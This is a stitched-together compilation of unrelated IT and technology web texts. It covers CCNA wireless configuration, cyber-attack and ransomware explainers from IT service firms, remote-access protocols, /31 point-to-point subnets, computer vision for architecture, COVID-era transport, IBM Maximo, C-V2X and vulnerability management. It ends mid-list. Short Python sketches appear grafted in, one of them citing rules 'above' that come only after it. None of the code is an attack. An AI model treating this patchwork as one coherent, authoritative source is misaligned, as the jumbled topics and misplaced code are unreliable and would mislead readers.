After configuring the basic required wireless parameters of the access point, additional fundamental wired-side parameters must be configured: the default router and the DHCP server. Given a pre-existing LAN, there must be a default router to exit the network and a DHCP server to lease IP addresses to wired PCs. The access point simply uses the existing router and DHCP servers for relaying IP addresses to wireless clients. Since the network has been expanded, verify that the existing DHCP IP address scope is large enough to accommodate the new wireless client additions. If this is a new installation with all router and access point functions in the same hardware, then you simply configure all parameters in the same hardware.
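The matching rules above — case-sensitive SSID, identical authentication and encryption methods, and a DHCP scope large enough for the new wireless clients — can be expressed as a small validation sketch. All field names here are hypothetical.

```python
def client_can_associate(ap: dict, client: dict) -> bool:
    """Check the exact-match rules: SSID (case-sensitive), auth, encryption."""
    return (ap["ssid"] == client["ssid"]                   # 'Office' != 'office'
            and ap["auth"] == client["auth"]               # e.g. PSK vs EAP
            and ap["encryption"] == client["encryption"])  # e.g. TKIP vs AES

def dhcp_scope_sufficient(scope_size: int, wired: int, wireless: int) -> bool:
    """Verify the existing scope can lease to wired plus new wireless hosts."""
    return scope_size >= wired + wireless
```

A pre-deployment checklist that runs both checks catches the two most common association failures before anyone picks up a laptop.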
Cisco CCNA Steps to Implement a Wireless Network
The basic approach to wireless implementation (as with any basic networking) is to gradually configure and test incrementally.
Before adding any wireless, verify the pre-existing network and Internet access for the wired hosts. Then implement wireless with only a single access point and a single client, without wireless security. Verify the wireless client receives a DHCP IP address and can ping the local wired default router and then browse to the external Internet. Lastly, configure wireless security with WPA. Only use WEP if the hardware is too old to support WPA.
Cisco CCNA Common Wireless Network Issues
If you follow the prior steps for implementing a wireless network, the divide-and-conquer technique of incremental configuration will most likely lead you to the most likely cause. The most common configuration issues are:
– Configuring a defined SSID on the client (rather than using its SSID discovery method) that does not match the access point’s SSID (including case sensitivity).
– Configuring incompatible security methods. Both the wireless client and the access point must match for authentication method (EAP or PSK) and encryption method (TKIP or AES).
Other common problems resulting from initial RF installation:
– Is the radio enabled on both the access point and client for the correct RF (2.4 GHz ISM or 5 GHz UNII)?
– Is an external antenna connected and facing correct direction (straight upward for dipole)?
– Is the antenna location too high or too low relative to wireless clients (within 20 vertical feet)?
– Are metal objects in the room reflecting RF and causing poor performance?
– Are you attempting to reach too great a distance?
New technology. New cyber threats. New security breaches.
Cyber threats have become a recurring occurrence and common news nowadays. Every year, new cyber security threats are coming up. And as we begin the promising year of 2021, we need to steel ourselves for the new cyber threats.
To protect yourself against such cyber attacks, you need to implement foolproof cybersecurity systems to keep the hackers out. However, it’s easier said than done.
To build a security system tailored to your sensitive data, you need to understand what really happens during a cybersecurity attack. This blog will take you through the journey of cyber attacks, the information that can be tapped, and the risks involved.
The Journey of a Cyber Attack – The Possibilities of Security Breaches
Anyone can be a victim of a cyber attack. Just last year, hackers even stole data from U.S. Customs and Border Protection, so there’s no telling when or who might be attacked next.
Our cybersecurity service experts in Corpus Christi have prevented many such attacks with our firewall protection and data security support. We also offer data security along with managed IT services that help businesses in Corpus Christi protect themselves against cyber threats.
Let’s jump right in and look at what hackers do during a cyber attack and how you can protect yourself.
Hackers Spot the Vulnerabilities
Many cyber-attacks happen because hackers spot a security vulnerability and exploit it. This vulnerability can be in any form — by brute-forcing the password, eavesdropping on the communications, extracting personal information through phishing attacks, and many more.
Often, such vulnerabilities are the silliest mistakes made by the employees, like using the most obvious password, accessing the official data from the home network that doesn’t have security, or leaving the system logged in at the end of the day.
The hackers find such loopholes in the website or the server and add a piece of their code to try and crack the vulnerability wide open. They may also inject malware or ransomware through the gaps in the system security.
Businesses Panic & Lose Evidence
As the data security of a business is compromised, people begin to panic.
They take rash actions that they would never take in full consciousness otherwise, and this leads to even bigger problems. Some companies make the mistake of not assessing the severity of the attack, or they prioritize the wrong things. One common mistake many make is deleting the evidence of the attack, which is the most valuable material for assessing and preventing future attacks.
This is why every business needs a cyberattack recovery plan in place. In times of panic, the security team can refer to this plan and start taking the steps one by one.
This recovery plan should be detailed, containing the complete SOP to identify and fix the vulnerability as soon as possible. While we can never predict what the cyber attack will be, it’s important to cover all possible threat scenarios in the recovery plan. The recovery plan should also insist that the team save the evidence before deleting any other files.
There are often a few important people who must be informed when there’s a cyber attack. For instance, when a data manager is informed of the attack, the person will initiate a risk management plan to backup the sensitive data and increase the security around it.
Similarly, several people in the organization should be kept in the loop about the cyber attack. However, many teams, in the frenzy of saving the situation, fail to communicate properly or communicate with bias. This could complicate matters and even open the data up to more risk.
The best way to tackle this issue — train the team for clear, quick, factual communication of the situation.
The Hackers Meanwhile Try Penetrating Deeper
See, there’s one thing about the hackers. Even if you keep enforcing more firewalls to keep the hackers out, they’ll keep trying and trying until they find another loophole.
What can you do during such times?
Keep enforcing better security continually, without resting for a minute, even when it looks like the hacker is giving up. You never know how and where the hacker might attack next. In the meantime, collect enough evidence about the attack, which may give you insight into it and inform the necessary steps.
While not all cyber attacks have a direct impact on an organization, they can send the wrong message out to the public. The best response is to analyze the attack once everything has calmed down and perform a complete, scrutinized security audit to identify and fix any other loopholes.
Doesn’t it look like a total mess in the face of a cyber attack?
Well, this is the common reality of many organizations when a hacker tries to gain access. You can avoid such frenzied mistakes and miscommunications during a cyber-attack by creating a risk management and recovery plan.
Even better, you can improve your data security, conduct regular audits, and get the help of a company offering security services in Corpus Christi like LayerOne Networks. Our managed IT services for companies in Corpus Christi provide a comprehensive solution for maintaining security, identifying cyber threats and loopholes even before the hackers do, and fixing them.
Contact us to find out how we can make your systems secure.
“…Christensen says they have been able to identify unique characteristics of buildings that point to stylistic influences beyond any initial blueprints.”
An art history academic is using computer vision to gather new insights into the creative forces behind architecture.
Writing for The Conversation, Peter Christensen, an Assistant Professor of Art History at the University of Rochester, says that he was inspired by the emergence of facial recognition technology. One particular inciting incident got him going, when the face-tagging feature of his iPhone confused one of his friends with the famous Great Mosque of Cordoba.
As he tells it, Christensen began to realize that this kind of computer vision technology could be used to look at buildings in new ways. He started “[t]hinking about buildings as objects with biometric identities,” and worked with a research team to build 3D scanning systems that could create digital mockups of buildings that could then be analyzed in a process “similar to facial recognition”.
In this way, Christensen says they have been able to identify unique characteristics of buildings that point to stylistic influences beyond any initial blueprints. Looking at railway stations built by foreign workers from a range of backgrounds in Canada in the late 19th century, for example, the researchers can use this technology to discover beveling on window frames or pointed arches that offer hints about who was working on these particular aspects of a building.
It’s a particularly niche example of how computer vision technologies have evolved to help people process visual data in new ways – to see the world, in other words. And while some facial recognition technology remains lamentably inaccurate in matching human faces, at least such inaccuracies can offer some surprising new insights in other applications.
Source: The Conversation (via CNN)
July 26, 2018 – by Alex Perala
Published 2 Years Ago on Monday, Aug 10 2020 By Mounir Jamil
As the COVID-19 pandemic continues, public transport needs to adapt to a new normal and start adopting greener technologies that will render it resilient to future disasters, according to a report by the Asian Development Bank (ADB). The report – Guidance Note on COVID-19 and Transport in Asia and the Pacific illustrates the impact of COVID-19 on transport, as lockdowns forced millions of people to begin working remotely, schools to shift to e-learning and customers to resort to online shopping and food delivery.
While notions of public transport have been previously perceived as mostly green, affordable, and efficient means of travel, initial trends in cities that have re-opened indicate that public transport is still considered relatively unsafe, and is not bouncing back as quickly as cycling, walking or private vehicles.
Further impacts of COVID-19 on transport became apparent as drastic lockdown measures around the globe brought world economies to their knees. Satellite footage recorded how concentrations of CO2 and air pollutants fell drastically, bringing clear blue skies to some cities. However, as cities have reopened, traffic levels have increased. If this trend continues on a wider scale, it could undo decades of effort that have been put into promoting sustainable development. As public transport reopens, passenger confidence can be restored through health and safety measures like cleaning, tracking, face coverings and thermal scanning.
As some countries start to enter the recovery phase, further precautionary and preventive operating measures and advanced technology can be implemented to enable contactless processes and ease an agile response. Demand management steps can ease crowd control in public transport and in airports. Government initiatives and financial aid are critical during this period to enable public transport to continue supporting the movement of passengers and goods in a sustainable way.
How do you supply clean water to a city beneath the sea?
Waternet in Amsterdam, NL depends upon IBM Maximo® Enterprise Asset Management
You drink it, grow with it, clean with it and use it to transport goods. Fresh, clean water is essential to life on our planet. So when you’re responsible for water for over one million people who are living below sea level, you can’t afford to take risks. This is why Waternet in Amsterdam, NL depends upon IBM Maximo® Enterprise Asset Management (EAM), bolstered by the expertise of their local IBM Business Partner, ZNAPZ.
The Netherlands is especially sensitive to water issues
Neder lands, or lower countries: the very name of this nation describes its topology. Only about 50% of the land is more than a meter (39.4 inches) above sea level. These areas, called polders, were originally reclaimed from swamps, lakes and ponds in the 16th century. Over the centuries, the polders have expanded exponentially. Their fertile soil has made the Netherlands the world’s second largest exporter of food and agricultural products, including the glorious tulip. In 1637, a single bulb cost ten times the salary of a skilled worker. Today, expansive fields of these beautiful, affordable blossoms are synonymous with the Dutch.
Fed by canals that also serve as transportation lanes, the agricultural industry, and the nation’s economy, are critically dependent upon water.
To complicate matters further, the Netherlands is a relatively small country that is home to a population of over 17 million people. It’s one of the most densely inhabited countries in the world. And each individual uses an average of 150 liters (33 gallons) of water each day.
With so much at stake, the uninterrupted availability of clean, fresh water is of paramount importance to the Dutch. The people in the Amsterdam region entrust their needs to the 1,800 talented professionals at Waternet.
Waternet manages thousands of assets each day
Unlike most water management organizations in Holland, Waternet manages the entire water lifecycle. They produce clean, fresh tap water. They make certain that wastewater and rainwater flow into the sewer system, and they treat it before they release it back into nature.
The company also monitors surface water to ensure it’s at the right levels. And they maintain dykes, clean the canals and maintain an unobstructed and uninterrupted water flow.
This is a monumental task that requires the continuous functioning of thousands of units, such as sensors, monitors, pumps, trucks, bridges, sluices and dredges. As Louis van Parera of Waternet says, “We run assets and these assets have to perform.”
To maintain their reliability and functionality, Waternet depends upon ZNAPZ and IBM Maximo enterprise asset management solutions.
IBM Maximo EAM helps keep the taps in Amsterdam flowing
IBM Maximo is the world’s leading enterprise asset management solution. Waternet has depended upon their EAM installation for over 15 years.
IBM Maximo IoT collects data from people, sensors, and devices, and analyzes it to provide the insights that decision-makers need to optimize operations. So rather than planning asset maintenance according to calendars, as in the past, users are able to schedule maintenance based on specific criteria for each individual unit.
The IBM Maximo solution is compatible with all asset types no matter where they reside. It allows users to set up new assets quickly, and upgrade EAM software automatically. The result is real-time visibility, non-stop uptime, reduced costs and minimized risk.
It’s not simply implementation, it’s a view to the future
To optimize their EAM system and to shepherd it to maturity, Waternet depends upon IBM Business Partner, ZNAPZ. As ZNAPZ Solution Architect Jan-Willem Steur tells us, their job isn’t restricted to examining today’s needs. It also requires that they look ahead and plan for the future – and not only in terms of assets. “The predictive nature isn’t just related to assets. It’s about a question of where the entire project is going.”
If your future includes enterprise asset management, you’ll want to learn more about IBM Maximo. I suggest you begin your journey by watching this informative interview with professionals from Waternet and ZNAPZ.
Learn more about Maximo
What is Remote Access? Connect Your Computer from Anywhere
Remote Access Definition
Remote access refers to when you have the ability to access a different computer or network in another place. Remote computer access is often used to enable people to access important files and software on another user’s computer.
With remote access, a user can monitor, maintain, and control devices as long as they are connected to the same network. This opens up the possibility to troubleshoot issues without being in the same physical location as the device with the problem.
Remote access also enables you to access necessary files without having them sent via email or other means. You can also define who has the rights to the files, as well as organize users into different categories, giving some groups access to certain things while limiting the access of others.
What Is Remote Desktop Access?
Remote desktop access describes software that allows access to someone’s personal computer desktop by another user. During the interaction, the other user can see the target desktop on their own device.
What Is Unattended Remote Access?
In an unattended remote access setup, you can access someone else's computer or server without them having to sit in front of it.
How Does Remote Computer Access Work?
A remote access connection gives users the power to connect to a private network from a different location. Both users have to connect to the same network.
Once both are connected to the remote access network, a protocol governed by access software interfaces that user's device with another user's device. The protocol gives one device the ability to access the functions of the target computer or server. This allows the keyboard, trackpad, touchscreen, or mouse of the controlling user to manipulate the target device.
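The controller/target relationship described above can be sketched as a toy loopback example. This is an illustration only, using plain Python sockets over localhost as a stand-in for the shared network; real remote-access protocols such as RDP or VNC add authentication, encryption, and screen and input streaming on top of a transport like this.

```python
import socket
import threading

def target_device(server_sock):
    # The "target" side: accept one controller connection,
    # receive a command, and send back an acknowledgement.
    conn, _ = server_sock.accept()
    with conn:
        command = conn.recv(1024).decode()
        conn.sendall(("executed: " + command).encode())

# The target listens on a local port (loopback stands in for the network).
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]
threading.Thread(target=target_device, args=(server,), daemon=True).start()

# The "controller" side: connect and issue a command to the target.
client = socket.create_connection(("127.0.0.1", port))
client.sendall(b"list_files")
reply = client.recv(1024).decode()
client.close()
print(reply)
```

The key idea is that both endpoints speak the same protocol over the same network: the controller sends input, and the target executes it and reports back.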
How To Gain Remote Access To Another Computer and What Are the Protocols?
Although there are different remote access protocols, three of the most often used types of remote access are:
- Virtual private network (VPN)
- Virtual network computing (VNC)
- Remote Desktop Protocol (RDP)
Some remote access methods involve limited access or sharing of resources, but VPNs, VNCs, and RDPs allow users to both gain access to and have full control over another person’s computer via a remote network.
Virtual Private Network or VPN
A VPN provides users with the ability to send and receive data between devices or via a private network that is extended over a public network. To gain access to another’s computer, both have to be connected to the same VPN and running the same access software.
Virtual Network Computing or VNC
With VNC, you have a graphical system through which users can share desktops. Whatever the remote user does on their keyboard or mouse gets sent to the other device, controlling it as if the person were sitting in front of it while also allowing the accessing user to see what they are doing on their own screen.
Remote Desktop Protocol or RDP
RDP is a protocol by Microsoft that provides a user with a graphical interface to connect with another computer via a network connection. The user utilizes the RDP client software while the other person’s computer runs the RDP server software.
Internet Proxy Servers
With internet proxy servers, a server performs the function of a go-between, allowing you to connect with another computer within the proxy server environment. Both computers connect to the same proxy server, and one user then gains access to the other’s computer.
What Are the Other Types of Remote Access?
There are other ways to access the information of another person’s computer, and each allows for different levels of control and data sharing.
- Cellular internet service connects two devices via a wireless connection
- Cable broadband allows users to share bandwidth with each other
- Digital subscriber line (DSL) makes use of a telephone network
- Fiber optics broadband uses a fiber connection to transfer large amounts of data quickly
- Satellite makes use of satellites to enable devices to connect through the internet
- Local-area network/wide-area network (LAN/WAN) involves making use of an encrypted network that connects users who sign in to it
- Desktop sharing involves software that allows people to share their desktop with several other people at once
- Privileged access management (PAM) consists of tools that make sure only the right people have access to certain files and apps on a network
- Vendor privileged access management (VPAM) enables secure sharing over a network controlled by an outside vendor that limits connection privileges
What Is a Remote Access Connection Manager?
A Remote Access Connection Manager (RasMan) is a service provided by Windows that manages VPN connections between your computer and the internet.
The Remote Access Connection Manager works by giving users the ability to organize RDP connections in groups. To make the group, the user initiates a “New” command from the File menu and is then guided through the creation of a group file.
Remote Access Security Best Practices
When engaging in remote access, regardless of the protocol, it is important to remember that your computer will be exposed to at least one other user. Because files can be transferred from one computer to another, the possibilities for the transfer of malware exist, as well as unacceptable access by an intruder. Here are some best practices to ensure remote access security.
- Use endpoint protection: Endpoint security makes sure each device involved in the remote connection is safe. It typically involves antivirus software, firewalls, and other measures.
- Use a secure connection: Public Wi-Fi can put both users at risk. A secure, trusted connection allows for a direct link that excludes unauthorized users.
- Use complex passwords: Use passwords with at least eight characters and a combination of numbers, symbols, and upper- and lower-case letters.
- Use multi-factor authentication (MFA): Multi-factor authentication, such as a username and a password coupled with biometrics or text messaging, adds an extra layer a bad actor would have to negotiate to gain access.
- Use an account lockout policy: If someone enters the wrong password a certain number of times, an account lockout policy can bar them from trying to connect again.
- Regularly update your software: Keeping your software up to date can keep your computer safe from new malicious viruses or malware.
- Limit how many users can use the service: The more users, the more potential access points for hackers or malware. Cutting down the number of users reduces the chances of infiltration.
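The complex-password rule in the list above is easy to make concrete. Below is a minimal sketch of a policy check implementing exactly the stated rule (at least eight characters with numbers, symbols, and upper- and lower-case letters); a real deployment would typically also screen candidates against breached-password lists.

```python
import re

def meets_policy(password: str) -> bool:
    # Enforce: at least eight characters, containing a digit,
    # a symbol, and both lower- and upper-case letters.
    return (len(password) >= 8
            and re.search(r"[0-9]", password) is not None
            and re.search(r"[a-z]", password) is not None
            and re.search(r"[A-Z]", password) is not None
            and re.search(r"[^A-Za-z0-9]", password) is not None)

print(meets_policy("S3cure!Pass"))  # True
print(meets_policy("password"))    # False: no digit, symbol, or upper-case
```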
Is Remote Access Safe and When Should You Use It?
With proper endpoint protection, multi-factor authentication, passwords, and software, remote access can be a safe way to connect two devices. It is important to keep an eye out for threats that may be particularly dangerous when two devices are connected remotely.
A Trojan horse, for example, would be easy to get from one device to another, and it could go undetected because it often appears harmless. Similarly, a Remote Access Trojan (RAT) can gain access to a machine and provide control to the remote hacker. The RAT can let an intruder access files and gain complete control of the device.
It is important to also be careful of dangers that could be spread accidentally through files sent from one computer to the other. Some of these include viruses, spyware, and other malware.
Remote Computer Access Solutions
Fortinet offers methods of remote access using a secure VPN connection. Protected by FortiGate, remote workers can access each other’s computers as well as those of internal workers safely and efficiently. The FortiGate VM next-generation firewall (NGFW) can support IPsec VPN traffic at speeds up to 20 Gbps. This enables seamless remote access without time-consuming glitches or delays.
Remote access lets you connect to another person’s computer and use it as if you were sitting in front of it yourself. The image of the other device’s desktop appears on your device, and your actions on your device can be used to control the other device almost as easily as if you were physically at the device.
The connection happens over remote access protocols, such as a virtual private network (VPN), virtual network computing (VNC), or Remote Desktop Protocol (RDP). Both users have to interface with the protocol for the connection to be successful, and both devices have to be compatible with the service. You can also connect using services like cable or fiber broadband, cellular service, or privileged access management (PAM).
It is critical to put security measures in place whenever you use remote access. Some best practices include endpoint protection, complex passwords, multi-factor authentication, updating your software, and limiting the number of users who can use the service. FortiGate provides users with a fast connection using VM next-generation firewall (NGFW) to enhance both security and effectiveness.
PTP LINKS (POINT TO POINT LINKS)
31-bit Subnet Mask (/31)
We can configure any external interface to use an IPv4 address with a 31-bit subnet mask. A 31-bit subnet mask is often used for an interface that is the endpoint of a point-to-point network. The use of 31-bit subnet masks for IPv4 point-to-point links is described in RFC 3021.
Router A’s FastEthernet 0/0 interface (192.168.0.0/31) is connected to Router B’s FastEthernet 0/0 interface (192.168.0.1/31).
R1(config)#int fa 0/0
R1(config-if)#ip add 192.168.0.0 255.255.255.254
% Warning: use /31 mask on non point-to-point interface cautiously
Thirty-one-bit subnets were first proposed in RFC 3021, which was primarily motivated by the potential for public address space conservation. Recall that shrinking a /30 subnet to a /31 effectively doubles the number of point-to-point links you can address from a finite range. Cisco IOS has supported /31 subnets for point-to-point links since release 12.2(2)T. We can put this theory into practice by addressing a point-to-point connection between two routers as 192.168.0.0/31. An ominous warning message, no doubt, but it works just fine. We can successfully ping the far-end interface, and the subnet is accurately reflected in the routing table:
R1# ping 192.168.0.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.0.1, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/16/20 ms
R1# show ip route
192.168.0.0/31 is subnetted, 1 subnets
C 192.168.0.0 is directly connected, FastEthernet0/0
At this juncture, one might think of using a 32-bit subnet mask (/32) for each side of a PTP link. The answer is no; the excerpt below describes why a /32 address on each side of a PTP link is not possible.
A 32-bit subnet mask defines a network with only one IP address. In mixed routing mode, you can only configure a 32-bit subnet mask for a physical external interface. Because you cannot configure a virtual external interface with a default gateway on a different subnet, you cannot use a /32 subnet mask for a virtual external interface, such as a VLAN or Link Aggregation interface.
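The address arithmetic behind /31 versus /30 and /32 can be verified with Python's standard ipaddress module, which implements the RFC 3021 special case: on a /31 both addresses are usable hosts, a /30 spends two extra addresses on the network and broadcast addresses, and a /32 holds exactly one address, leaving no room for a far-end neighbour.

```python
import ipaddress

# RFC 3021: on a /31, both addresses are usable host addresses.
p2p = ipaddress.ip_network("192.168.0.0/31")
print([str(h) for h in p2p.hosts()])       # ['192.168.0.0', '192.168.0.1']

# A classic /30 point-to-point subnet wastes two of its four addresses.
classic = ipaddress.ip_network("192.168.0.0/30")
print([str(h) for h in classic.hosts()])   # ['192.168.0.1', '192.168.0.2']

# A /32 defines a network with a single address.
host_route = ipaddress.ip_network("192.168.0.1/32")
print([str(h) for h in host_route.hosts()])  # ['192.168.0.1']
```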
Ransomware is essentially a digital mechanism used for extortion. Most commonly, ransomware attacks encrypt the victim’s data and then demand a ransom for the return of the information. Data is an incredibly valuable asset, many people are willing to pay for its return.
Unfortunately, paying the ransom is the worst decision you can make as a ransomware victim. Paying does not guarantee that your information will be returned, or that it will be returned decrypted. Modern crypto malware uses encryption schemes that seem to be unbreakable, so paying up may feel like your only option to get your data back.
We will discuss every aspect of ransomware, from how it happens, how not to be vulnerable, and the best course of action if you do fall victim.
As cybercriminals become increasingly aware that ransomware victims are willing to pay to get their information back, the prevalence of ransomware and its variations will continue to rise.
A common ransomware scenario is as follows. The victim receives an email from what appears to be a friend or other trusted source, and the email contains an executable link. The file is opened unknowingly because it appears innocent to the recipient, and this immediately triggers the download of crypto malware. The victim’s files are then encrypted and held hostage for a ransom in order to get the decryption key.
A different, more sophisticated crypto malware mechanism is delivered as a Trojan of the Zeus/Citroni family, which can be purchased by attackers for only a few thousand dollars. This sum is not significant when considering the hundreds of thousands of dollars it can earn the cybercriminal. Attackers are able to drop Citroni onto a user’s computer using the Angler exploit kit. This particular ransomware contains a number of unique features and, according to researchers, is the first ransomware that used the Tor network for command and control.
Regardless of the delivery, victims are often made aware of the attack via the appearance of a dialogue box, informing them of the infection, and demanding a ransom amount. Users are often told that they have 72 hours to pay the ransom or the decryption key will be destroyed and their information will be lost forever.
The Big-Business Of Ransomware
A large number of victims simply pay the ransom and chalk it up to the cost of doing business in the digital age. Because of this, ransomware is big business for cybercriminals. One of the most famous ransomware variations, called “CryptoLocker”, has infected tens of thousands of machines, generating millions in revenue for the attackers behind it.
The numbers don’t lie, and the threat of crypto malware is increasing, with attack reports in the millions, and growing by leaps and bounds every year. As long as people are willing to pay the ransom, the threat will continue. Statistics show that up to 40% of victims pay the ransom, helping attackers rake in an estimated $30 million a quarter.
Because of the inability to decipher files that have been encrypted by modern crypto malware, there is an additional threat: that of a false remedy. Users who are desperate to resolve their issue without paying the ransom search the internet for help and stumble across software that claims to fix the encrypted data. In reality, there is no fix, and the software is either a useless waste of money or, worse, distributes additional malware.
The Evolution Of Ransomware
Cybercriminals become more sophisticated in their methods with every passing year. In the beginning, the first crypto malware used a symmetric-key algorithm, using the same key for encryption as for decryption. This made it easier, with the help of anti-malware vendors, for the encrypted information to be decrypted.
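As a toy illustration of why early symmetric-key ransomware was recoverable, consider the deliberately weak XOR cipher below (not a real cryptosystem). Because the same key both encrypts and decrypts, the key must be present on the victim's machine at encryption time, so anyone who recovers it, for example from memory or from the malware binary itself, can undo the damage.

```python
import os

def xor_cipher(data: bytes, key: bytes) -> bytes:
    # Toy symmetric scheme: the SAME key both encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = os.urandom(16)                 # key generated on the victim machine
plaintext = b"quarterly-report.xlsx contents"
ciphertext = xor_cipher(plaintext, key)

# Symmetric encryption: applying the cipher again with the same key
# restores the original data.
recovered = xor_cipher(ciphertext, key)
print(recovered == plaintext)
```

With public-key schemes, by contrast, only the attacker's private key can decrypt, and that key never touches the victim's machine, which is what made later variants effectively unbreakable.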
It didn’t take long for attackers to step up their game, and they began using public-key cryptography algorithms that use two separate keys: a public key for encryption and a private key for decryption. One of the first public-key cryptosystems to be used by cybercriminals was RSA; experts were able to crack a 660-bit RSA key, but soon after, the authors switched to a 1,024-bit key, making decryption practically impossible.
It is not possible to decrypt files that have been encrypted by modern crypto malware. This means the only measure of defense one has is it to keep data safe by backing up files. Unfortunately, a regular backup is not enough, as it leaves files that have been recently changed unprotected.
Many ransomware variants are intelligent enough to look for backups and encrypt those as well, including those residing on network shares. In response to this, Kaspersky has developed an alternative method of defense, based on the System Watcher module.
Don’t leave yourself vulnerable to malware attack. Contact Hammett Technologies to discuss how to stay ahead of cybercriminals and ensure you are never left without your important information or resources. Call us at (443) 216-9999 or send an email to email@example.com.
Cellular Vehicle-to-Everything (C-V2X)
The automotive sector is on the brink of a digital revolution with the commencement of 5G, bringing new opportunities for cellular vehicle-to-everything (C-V2X) technology. Next-gen capabilities such as ultra-reliable low-latency communication (URLLC) and high bandwidth are set to transform connected cars and, ultimately, the way we travel.
Existing cellular technology addresses some V2X requirements, so what makes 5G so different? Combined with fast-developing AI and sensor technologies, 5G will enable completely autonomous vehicles. This means the possibility of eliminating or minimizing road accidents by enabling vehicles to share data in real-time and avoid accidents. In addition, 5G-powered self-driving cars will also vastly improve vehicular performance through energy optimization, ensure traffic efficiency, provide faster routes through accurate route mapping, enable safer roads by letting drivers “see” beyond their visual horizon, and much more. V2X will not only help vehicles communicate with each other and prevent accidents and hazards, but it will also help protect pedestrians with the PC5 interface integrated into their smartphones.
The result: significantly improved quality of life and tremendous monetary savings.
V2X capabilities and transmission modes
The connected cars of today have been evolving for years to become increasingly connected, intelligent, autonomous, and efficient. Apart from reducing latency and enhancing safety, cellular V2X also brings new capabilities to the table.
As a part of 3GPP release 14, V2X includes two transmission modes that collectively enable several use cases:
Direct C-V2X (Cellular V2X) – operates in its own 5.9 GHz spectrum that is independent of mobile networks. It includes the following use cases:
- Cars connecting to each other – Vehicle to Vehicle (V2V)
- Cars connecting to pedestrians – Vehicle to Pedestrians (V2P)
- Cars connecting to infrastructure like street signals – Vehicle to Infrastructure (V2I)
Vehicle to Network (V2N) – relies on traditional licensed mobile spectrum
In Release 16, too, direct C-V2X can operate without dependence on cellular networks. However, 5G connectivity helps build an ecosystem of highly reliable and accurate devices that enable autonomous vehicles. These include sensors, cameras, light detection devices, real-time car-to-car communications, and more. With 5G’s ability to support a large number of connected devices in a small geographical area, vehicles will be able to access more data about their surroundings.
C-V2X use cases enabled by 5G
The V2X ecosystem enables a broad range of services for connected car environments, and 5G takes accuracy to new heights. Some high-value use cases include:
Why it demands an edge core
Today, autonomous cars like Tesla and Zoox are highly advanced and require mission-critical low latency. 5G URLLC enables them to meet their full potential. The 5G edge core is essential in enabling mobile network operators to cater to 5G connected cars by helping keep latency low, maintaining safety even for vehicles driving at high speeds.
How does 5G core enable V2X?
An edge core with high transaction per second (TPS) is imperative for C-V2X. Alepo’s 5G Converged Core provides V2X support, including V2X subscriptions and policies, the capability to configure and maintain V2X subscription parameters, and more. It allows UEs to be authorized for V2X capability in both EPC and 5GC. UEs can be classified into two types – vehicle and pedestrian – each having its own QoS parameters.
Alepo’s Policy Control Function (PCF) will help configure policies for vehicle and pedestrian UEs. The operator can launch innovative V2X services by defining parameters such as RAT, transmission profile, communication mode, and signaling protection mode. Individual services can then be associated with a V2X policy, customizable for different geographical areas and radio parameters.
With Alepo’s Subscriber Data Management (SDM) agent portal, each individual subscriber profile can be enabled for V2X services. This flexible configuration will enable the operator to achieve optimized end-to-end V2X connectivity.
Where we’re headed
Cellular vehicle-to-everything provides a host of benefits for all involved parties: vehicle manufacturers, drivers, pedestrians, those in charge of traffic operations and management, and, of course, 5G network providers. 5G enables the end-to-end delivery of V2X services, ensuring high ROI.
C-V2X can be rapidly deployed as it is compatible with LTE base stations. 3GPP standards help provide a roadmap for operators to evolve from LTE to 5G, ensuring a highly scalable and future-proof investment. Operators can leverage their existing network infrastructure for the initial rollout of services, and gradually transition as they evolve their networks.
It will be a while before the autonomous car ecosystem is fully functional. However, the technology is ready and communications service providers should invest in the necessary infrastructure now. Trials should be conducted to ensure the reliability and feasibility of the ecosystem.
Alepo already has 5G trials underway, and we’d love to share the details with you. To know more, write to us on firstname.lastname@example.org.
Vulnerability Management - What every CISO needs to know
Understanding your organisation’s vulnerabilities is a topic that every CISO needs to know, and one that every board member would rather not have to learn about, as it covers so many things: assessing your host, network, and application vulnerabilities, and strategies to remediate them. Every year, thousands of new vulnerabilities are discovered, meaning that organisations must continually patch operating systems (OS) and applications and reconfigure security settings throughout the entirety of their network environment.
In this article we are going to understand in more detail what vulnerability management is, what is vulnerability, how to manage the process, how to make it a board priority and finally, how to find solutions to vulnerability management.
What is Vulnerability Management?
First, we must understand what vulnerability management is. Wikipedia describes it as the “cyclical practice of identifying, classifying, prioritising, remediating, and mitigating” software vulnerabilities, noting that “vulnerability management is integral to computer security and network security, and must not be confused with vulnerability assessment.”
The most important aspect about vulnerability management is that it is an ongoing process, one used to continuously identify vulnerabilities that can be remediated through patching and configuration of security settings.
This kind of analysis can help organisations stay ahead of the common issues found in cybersecurity and make the necessary changes to ensure that they are protected for present and future requirements.
What is Vulnerability?
Vulnerabilities are potential weaknesses that can be exploited by criminals. These can be things such as:
- Malware susceptibility - These include computer viruses, computer worms, ransomware, keyloggers, Trojan horses, and spyware.
- Insecure system configurations - This is where a configuration is just plain wrong, either from the start or after changes were made that compromise the security of the application or system. This faulty configuration can then end up getting used everywhere in the company.
- Proxy attacks - This is where an attacker will install a proxy through which the user's network traffic will be passed. The attacker can gather confidential information from the traffic while retransmitting it back and forth between the victim and a remote website.
- Botnet attacks - Botnets are networks of hijacked computer devices used to carry out various scams and cyberattacks. The term “botnet” is formed from the words “robot” and “network.” Assembly of a botnet is usually the infiltration stage of a multi-layer scheme.
Vulnerability Management Process
The vulnerability management process is a way to define a process so that organisations can identify and address vulnerabilities quickly and continually.
There are 4 stages to the vulnerability management process which include:
- First: Determine how critical assets are
- Second: Carry out discovery to create an inventory of assets.
- Third: Identify vulnerabilities
- Fourth: Remediate and report.
Once you have identified the 4 stages, the next element to focus on is the processes which make up vulnerability management - 6 in total - each with their own subprocesses and tasks.
- Discover: there is no way to secure what you’re unaware of. Firstly, you must take an inventory of all assets across the environment, identifying details including operating system, services, applications, and configurations to identify vulnerabilities. This can include both a network scan and an authenticated agent-based system scan. Discovery should be performed regularly on an automated schedule.
- Prioritise: You must then categorise into groups the discovered assets and assign a risk-based prioritisation based on criticality to the organisation.
- Assess: You must establish the risk baseline for your point of reference as vulnerabilities are remediated and risk is eliminated. Assessments provide an ongoing baseline over time.
- Remediate: Based on risk priorities, vulnerabilities should be fixed (whether via something like patching or reconfiguration). Controls should be in place so that any remediation is completed successfully and progress can be documented.
